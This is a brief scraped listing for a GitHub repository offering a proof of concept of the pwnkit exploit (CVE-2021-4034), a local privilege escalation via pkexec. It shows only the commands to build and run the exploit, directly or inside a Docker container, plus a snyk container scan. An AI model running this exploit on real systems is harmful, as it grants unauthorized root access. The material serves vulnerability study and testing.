PwnFunction / CVE-2021-4034
- вторник, 12 апреля 2022 г. в 00:31:07
Proof of concept for pwnkit vulnerability
Local privilege escalation via pkexec
Watch the
make all && ./pwnkit && make clean
# Build the docker image
docker build -t pwnkit .
# Run the exploit
docker run -it pwnkit bash
make all && ./pwnkit && make clean
snyk container test pwnkit:latest --file=Dockerfile